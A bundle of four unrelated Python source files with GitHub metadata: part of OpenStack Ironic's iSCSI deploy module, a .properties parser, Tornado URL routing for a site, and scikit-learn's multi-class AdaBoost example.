:raises: MissingParameterValue, if any of the required parameters are
missing.
:raises: InvalidParameterValue, if any of the parameters have invalid
value.
"""
info = node.instance_info
i_info = {}
i_info['image_source'] = info.get('image_source')
i_info['root_gb'] = info.get('root_gb')
error_msg = _("Cannot validate iSCSI deploy. Some parameters were missing"
" in node's instance_info")
deploy_utils.check_for_missing_params(i_info, error_msg)
# Internal use only
i_info['deploy_key'] = info.get('deploy_key')
i_info['swap_mb'] = info.get('swap_mb', 0)
i_info['ephemeral_gb'] = info.get('ephemeral_gb', 0)
i_info['ephemeral_format'] = info.get('ephemeral_format')
err_msg_invalid = _("Cannot validate parameter for iSCSI deploy. "
"Invalid parameter %(param)s. Reason: %(reason)s")
for param in ('root_gb', 'swap_mb', 'ephemeral_gb'):
try:
int(i_info[param])
except ValueError:
reason = _("'%s' is not an integer value.") % i_info[param]
raise exception.InvalidParameterValue(err_msg_invalid %
{'param': param, 'reason': reason})
if i_info['ephemeral_gb'] and not i_info['ephemeral_format']:
i_info['ephemeral_format'] = CONF.pxe.default_ephemeral_format
preserve_ephemeral = info.get('preserve_ephemeral', False)
try:
i_info['preserve_ephemeral'] = strutils.bool_from_string(
preserve_ephemeral, strict=True)
except ValueError as e:
raise exception.InvalidParameterValue(err_msg_invalid %
{'param': 'preserve_ephemeral', 'reason': e})
return i_info
def check_image_size(task):
"""Check if the requested image is larger than the root partition size.
:param task: a TaskManager instance containing the node to act on.
:raises: InstanceDeployFailure if size of the image is greater than root
partition.
"""
i_info = parse_instance_info(task.node)
image_path = _get_image_file_path(task.node.uuid)
image_mb = deploy_utils.get_image_mb(image_path)
root_mb = 1024 * int(i_info['root_gb'])
if image_mb > root_mb:
msg = (_('Root partition is too small for requested image. '
'Image size: %(image_mb)d MB, Root size: %(root_mb)d MB')
% {'image_mb': image_mb, 'root_mb': root_mb})
raise exception.InstanceDeployFailure(msg)
def cache_instance_image(ctx, node):
"""Fetch the instance's image from Glance
    This method pulls the image and writes it to the appropriate place
    on local disk.
:param ctx: context
:param node: an ironic node object
:returns: a tuple containing the uuid of the image and the path in
the filesystem where image is cached.
"""
i_info = parse_instance_info(node)
fileutils.ensure_tree(_get_image_dir_path(node.uuid))
image_path = _get_image_file_path(node.uuid)
uuid = i_info['image_source']
LOG.debug("Fetching image %(ami)s for node %(uuid)s",
{'ami': uuid, 'uuid': node.uuid})
deploy_utils.fetch_images(ctx, InstanceImageCache(), [(uuid, image_path)],
CONF.force_raw_images)
return (uuid, image_path)
def destroy_images(node_uuid):
"""Delete instance's image file.
:param node_uuid: the uuid of the ironic node.
"""
utils.unlink_without_raise(_get_image_file_path(node_uuid))
utils.rmtree_without_raise(_get_image_dir_path(node_uuid))
InstanceImageCache().clean_up()
def get_deploy_info(node, **kwargs):
"""Returns the information required for doing iSCSI deploy in a dictionary.
:param node: ironic node object
:param kwargs: the keyword args passed from the conductor node.
:raises: MissingParameterValue, if some required parameters were not
passed.
:raises: InvalidParameterValue, if any of the parameters have invalid
value.
"""
deploy_key = kwargs.get('key')
i_info = parse_instance_info(node)
if i_info['deploy_key'] != deploy_key:
raise exception.InvalidParameterValue(_("Deploy key does not match"))
params = {'address': kwargs.get('address'),
'port': kwargs.get('port', '3260'),
'iqn': kwargs.get('iqn'),
'lun': kwargs.get('lun', '1'),
'image_path': _get_image_file_path(node.uuid),
'root_mb': 1024 * int(i_info['root_gb']),
'swap_mb': int(i_info['swap_mb']),
'ephemeral_mb': 1024 * int(i_info['ephemeral_gb']),
'preserve_ephemeral': i_info['preserve_ephemeral'],
'node_uuid': node.uuid,
}
missing = [key for key in params if params[key] is None]
if missing:
raise exception.MissingParameterValue(_(
"Parameters %s were not passed to ironic"
" for deploy.") % missing)
# ephemeral_format is nullable
params['ephemeral_format'] = i_info.get('ephemeral_format')
return params
def set_failed_state(task, msg):
"""Sets the deploy status as failed with relevant messages.
    This method sets the deployment as failed with the given message.
It sets node's provision_state to DEPLOYFAIL and updates last_error
with the given error message. It also powers off the baremetal node.
:param task: a TaskManager instance containing the node to act on.
:param msg: the message to set in last_error of the node.
"""
node = task.node
node.provision_state = states.DEPLOYFAIL
node.target_provision_state = states.NOSTATE
node.save()
try:
manager_utils.node_power_action(task, states.POWER_OFF)
except Exception:
msg2 = (_('Node %s failed to power off while handling deploy '
'failure. This may be a serious condition. Node '
'should be removed from Ironic or put in maintenance '
'mode until the problem is resolved.') % node.uuid)
LOG.exception(msg2)
finally:
# NOTE(deva): node_power_action() erases node.last_error
# so we need to set it again here.
node.last_error = msg
node.save()
def continue_deploy(task, **kwargs):
"""Resume a deployment upon getting POST data from deploy ramdisk.
This method raises no exceptions because it is intended to be
invoked asynchronously as a callback from the deploy ramdisk.
:param task: a TaskManager instance containing the node to act on.
:param kwargs: the kwargs to be passed to deploy.
:returns: UUID of the root partition or None on error.
"""
node = task.node
node.provision_state = states.DEPLOYING
node.save()
params = get_deploy_info(node, **kwargs)
ramdisk_error = kwargs.get('error')
if ramdisk_error:
LOG.error(_LE('Error returned from deploy ramdisk: %s'),
ramdisk_error)
set_failed_state(task, _('Failure in deploy ramdisk.'))
destroy_images(node.uuid)
return
LOG.info(_LI('Continuing deployment for node %(node)s, params %(params)s'),
{'node': node.uuid, 'params': params})
root_uuid = None
try:
root_uuid = deploy_utils.deploy(**params)
except Exception as e:
LOG.error(_LE('Deploy failed for instance %(instance)s. '
'Error: %(error)s'),
{'instance': node.instance_uuid, 'error': e})
set_failed_state(task, _('Failed to continue iSCSI deployment.'))
destroy_images(node.uuid)
return root_uuid
def build_deploy_ramdisk_options(node):
"""Build the ramdisk config options for a node
This method builds the ramdisk options for a node,
    given all the required parameters for doing an iSCSI deploy.
:param node: a single Node.
:returns: A dictionary of options to be passed to ramdisk for performing
the deploy.
"""
# NOTE: we should strip '/' from the end because this is intended for
# hardcoded ramdisk script
ironic_api = (CONF.conductor.api_url or
keystone.get_service_url()).rstrip('/')
deploy_key = utils.random_alnum(32)
i_info = node.instance_info
i_info['deploy_key'] = deploy_key
node.instance_info = i_info
node.save()
deploy_options = {
'deployment_id': node['uuid'],
'deployment_key': deploy_key,
'iscsi_target_iqn': "iqn-%s" % node.uuid,
'ironic_api_url': ironic_api,
'disk': CONF.pxe.disk_devices,
}
return deploy_options
def validate_glance_image_properties(ctx, deploy_info, properties):
"""Validate the image in Glance.
    Check if the image exists in Glance and if it contains the
properties passed.
:param ctx: security context
:param deploy_info: the deploy_info to be validated
:param properties: the list of image meta-properties to be validated.
:raises: InvalidParameterValue if connection to glance failed or
authorization for accessing image failed or if image doesn't exist.
:raises: MissingParameterValue if the glance image doesn't contain
the mentioned properties.
"""
image_id = deploy_info['image_source']
try:
glance_service = service.Service(version=1, context=ctx)
image_props = glance_service.show(image_id)['properties']
except (exception.GlanceConnectionFailed,
exception.ImageNotAuthorized,
exception.Invalid):
raise exception.InvalidParameterValue(_(
"Failed to connect to Glance to get the properties "
"of the image %s") % image_id)
except exception.ImageNotFound:
raise exception.InvalidParameterValue(_(
"Image %s not found in Glance") % image_id)
missing_props = []
for prop in properties:
if not image_props.get(prop):
missing_props.append(prop)
if missing_props:
props = ', '.join(missing_props)
raise exception.MissingParameterValue(_(
"Image %(image)s is missing the following properties: "
"%(properties)s") % {'image': image_id, 'properties': props})
def validate(task):
"""Validates the pre-requisites for iSCSI deploy.
    Validates whether the node in the task provided has some ports enrolled.
    This method also validates whether the conductor URL is available either
    from the CONF file or from the keystone catalog.
:param task: a TaskManager instance containing the node to act on.
:raises: InvalidParameterValue if the URL of the Ironic API service is not
configured in config file and is not accessible via Keystone
catalog.
:raises: MissingParameterValue if no ports are enrolled for the given node.
"""
node = task.node
if not driver_utils.get_node_mac_addresses(task):
raise exception.MissingParameterValue(_("Node %s does not have "
"any port associated with it.") % node.uuid)
try:
# TODO(lucasagomes): Validate the format of the URL
CONF.conductor.api_url or keystone.get_service_url()
except (exception.KeystoneFailure,
exception.CatalogNotFound,
exception.KeystoneUnauthorized) as e:
raise exception.InvalidParameterValue(_(
"Couldn't get the URL of the Ironic API service from the "
"configuration file or keystone catalog. Keystone error: %s") % e)
|
{
"content_hash": "f35c9fa3778bd78eef5d3498dd801a16",
"timestamp": "",
"source": "github",
"line_count": 398,
"max_line_length": 79,
"avg_line_length": 37.82663316582914,
"alnum_prop": 0.6401195616074394,
"repo_name": "Tehsmash/ironic",
"id": "5526018caf002794ab11e20c8874eb09a2480a1d",
"size": "15712",
"binary": false,
"copies": "1",
"ref": "refs/heads/staging/kiloplus",
"path": "ironic/drivers/modules/iscsi_deploy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2250030"
}
],
"symlink_target": ""
}
|
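A test-style sketch of parse_instance_info above with a minimal stand-in node.
It assumes ironic of this vintage is importable and that a duck-typed object
with an instance_info attribute is enough, which the function body suggests
but does not guarantee; the values themselves are hypothetical.

from ironic.drivers.modules.iscsi_deploy import parse_instance_info

class FakeNode(object):
    instance_info = {
        'image_source': 'glance://deadbeef',  # hypothetical image reference
        'root_gb': 10,
        'swap_mb': 512,
        'deploy_key': 'abc123',               # hypothetical internal key
    }

i_info = parse_instance_info(FakeNode())
print("root_gb=%s swap_mb=%s" % (i_info['root_gb'], i_info['swap_mb']))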
import re
from lline import LLine
def to_logical_lines(natural_lines):
""" Parse natural lines into a list of logical lines."""
lines = []
terminated_logical_line = True
for l in natural_lines:
if _is_comment(l):
lines.append(LLine(natural_lines=[l], key=None, value=None))
continue
if not terminated_logical_line:
lines[-1].natural_lines.append(l)
terminated_logical_line = _is_terminated(l)
continue
if _is_empty(l):
lines.append(LLine(natural_lines=[l], key=None, value=None))
continue
key, value = _to_key_value(l)
if key is not None:
lines.append(LLine(natural_lines=[l], key=key, value=value))
terminated_logical_line = _is_terminated(l)
return lines
# ----------------------------------
# Helper parsing functions
# ----------------------------------
def _is_comment(line):
return re.search(r'^\s*[!#]', line) is not None
def _is_empty(line):
return len(line.strip()) == 0
def _is_terminated(line):
"""Return true if value continues on next line"""
m = re.search(r'\\+$', line)
return m is None or len(m.group(0)) % 2 == 0
def _to_key_value(line):
"""Parse a line into a (key,value) tuple"""
pair = re.match(r'\s*(?P<key>((\\[ =:])|[^ =:\s])+)\s*([=: ]\s*(?P<value>.*))?$', line)
if pair is None:
return None, None
else:
return pair.group('key'), pair.group('value') or ''
|
{
"content_hash": "c1b7e0af0f8fa66bad08e9e830bbf839",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 91,
"avg_line_length": 26.17241379310345,
"alnum_prop": 0.5428194993412385,
"repo_name": "mkrcah/propsort",
"id": "21c1a9d3a3d6259b6c2276ccf2bac315be62042e",
"size": "1518",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "propsort/parsing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9898"
}
],
"symlink_target": ""
}
|
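A short sketch of to_logical_lines on a .properties-style snippet; it assumes
LLine exposes the key/value attributes its constructor call above suggests.

lines = [
    "# a comment",
    "greeting = hello \\",
    "world",
    "answer:42",
]
for ll in to_logical_lines(lines):
    print("%r -> %r" % (ll.key, ll.value))
# The comment maps to (None, None); 'greeting' keeps its raw value, trailing
# backslash included, with the continuation folded into natural_lines;
# 'answer' parses to '42'.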
from poweredsites.libs.handler import ErrorHandler
handlers = []
sub_handlers = []
ui_modules = {}
from poweredsites.handlers import admin, blog, front, \
help, project, site, user
handlers.extend(front.handlers)
handlers.extend(user.handlers)
handlers.extend(site.handlers)
handlers.extend(project.handlers)
handlers.extend(help.handlers)
# Append default 404 handler, and make sure it is the last one.
handlers.append((r".*", ErrorHandler))
sub_handlers.append(site.sub_handlers)
sub_handlers.append(blog.sub_handlers)
sub_handlers.append(admin.sub_handlers)
# The wildcard subdomain handler for project should be the last one.
sub_handlers.append(project.sub_handlers)
ui_modules.update(front.ui_modules)
ui_modules.update(site.ui_modules)
ui_modules.update(project.ui_modules)
ui_modules.update(blog.ui_modules)
for sh in sub_handlers:
sh.append((r".*", ErrorHandler))
|
{
"content_hash": "f0d410720154a6b2f968264cc08fe8dc",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 63,
"avg_line_length": 27.294117647058822,
"alnum_prop": 0.7359913793103449,
"repo_name": "felinx/poweredsites",
"id": "db0dc2cdcface30eda39649fcde522221651e514",
"size": "1552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poweredsites/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "156464"
},
{
"name": "Python",
"bytes": "155120"
},
{
"name": "Shell",
"bytes": "0"
}
],
"symlink_target": ""
}
|
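A hedged sketch of how tables like these are typically consumed in a Tornado
app; the Application wiring below is an assumption, not poweredsites' actual
startup code.

import tornado.web

app = tornado.web.Application(handlers, ui_modules=ui_modules)
app.listen(8888)
# tornado.ioloop.IOLoop.instance().start()  # uncomment to serve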
"""
=====================================
Multi-class AdaBoosted Decision Trees
=====================================
This example reproduces Figure 1 of Zhu et al [1] and shows how boosting can
improve prediction accuracy on a multi-class problem. The classification
dataset is constructed by taking a ten-dimensional standard normal distribution
and defining three classes separated by nested concentric ten-dimensional
spheres such that roughly equal numbers of samples are in each class (quantiles
of the :math:`\chi^2` distribution).
The performance of the SAMME and SAMME.R [1] algorithms is compared. SAMME.R
uses the probability estimates to update the additive model, while SAMME uses
the classifications only. As the example illustrates, the SAMME.R algorithm
typically converges faster than SAMME, achieving a lower test error with fewer
boosting iterations. The error of each algorithm on the test set after each
boosting iteration is shown on the left, the classification error on the test
set of each tree is shown in the middle, and the boost weight of each tree is
shown on the right. All trees have a weight of one in the SAMME.R algorithm and
therefore are not shown.
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
print(__doc__)
# Author: Noel Dawe <noel.dawe@gmail.com>
#
# License: BSD 3 clause
from sklearn.externals.six.moves import zip
import matplotlib.pyplot as plt
from sklearn.datasets import make_gaussian_quantiles
from sklearn.ensemble import AdaBoostClassifier
from sklearn.externals.six.moves import xrange
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
X, y = make_gaussian_quantiles(n_samples=13000, n_features=10,
n_classes=3, random_state=1)
n_split = 3000
X_train, X_test = X[:n_split], X[n_split:]
y_train, y_test = y[:n_split], y[n_split:]
bdt_real = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1)
bdt_discrete = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1.5,
algorithm="SAMME")
bdt_real.fit(X_train, y_train)
bdt_discrete.fit(X_train, y_train)
real_test_errors = []
discrete_test_errors = []
for real_test_predict, discrete_test_predict in zip(
        bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):
    real_test_errors.append(
        1. - accuracy_score(real_test_predict, y_test))
    discrete_test_errors.append(
        1. - accuracy_score(discrete_test_predict, y_test))
n_trees = xrange(1, len(bdt_discrete) + 1)
plt.figure(figsize=(15, 5))
plt.subplot(131)
plt.plot(n_trees, discrete_test_errors, c='black', label='SAMME')
plt.plot(n_trees, real_test_errors, c='black',
linestyle='dashed', label='SAMME.R')
plt.legend()
plt.ylim(0.18, 0.62)
plt.ylabel('Test Error')
plt.xlabel('Number of Trees')
plt.subplot(132)
plt.plot(n_trees, bdt_discrete.estimator_errors_, "b", label='SAMME', alpha=.5)
plt.plot(n_trees, bdt_real.estimator_errors_, "r", label='SAMME.R', alpha=.5)
plt.legend()
plt.ylabel('Error')
plt.xlabel('Number of Trees')
plt.ylim((.2,
max(bdt_real.estimator_errors_.max(),
bdt_discrete.estimator_errors_.max()) * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
plt.subplot(133)
plt.plot(n_trees, bdt_discrete.estimator_weights_, "b", label='SAMME')
plt.legend()
plt.ylabel('Weight')
plt.xlabel('Number of Trees')
plt.ylim((0, bdt_discrete.estimator_weights_.max() * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
# prevent overlapping y-axis labels
plt.subplots_adjust(wspace=0.25)
plt.show()
|
{
"content_hash": "3e0b19fe57ea853c450e0f43c740f7bb",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 79,
"avg_line_length": 33.56880733944954,
"alnum_prop": 0.7122164525826729,
"repo_name": "treycausey/scikit-learn",
"id": "9fe609f489c289279b66fa73c39725e28817e6d7",
"size": "3659",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/ensemble/plot_adaboost_multiclass.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "18150950"
},
{
"name": "C++",
"bytes": "1807769"
},
{
"name": "JavaScript",
"bytes": "20564"
},
{
"name": "Python",
"bytes": "5083789"
},
{
"name": "Shell",
"bytes": "3768"
}
],
"symlink_target": ""
}
|
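The key device in the example above is staged_predict, which yields
predictions after each boosting iteration so the test error can be tracked
without refitting. A minimal sketch isolating that step, assuming the
estimators fitted above are in scope:

for i, y_pred in enumerate(bdt_discrete.staged_predict(X_test), start=1):
    if i in (1, 100, 600):
        print("%d trees: test error %.3f"
              % (i, 1. - accuracy_score(y_test, y_pred)))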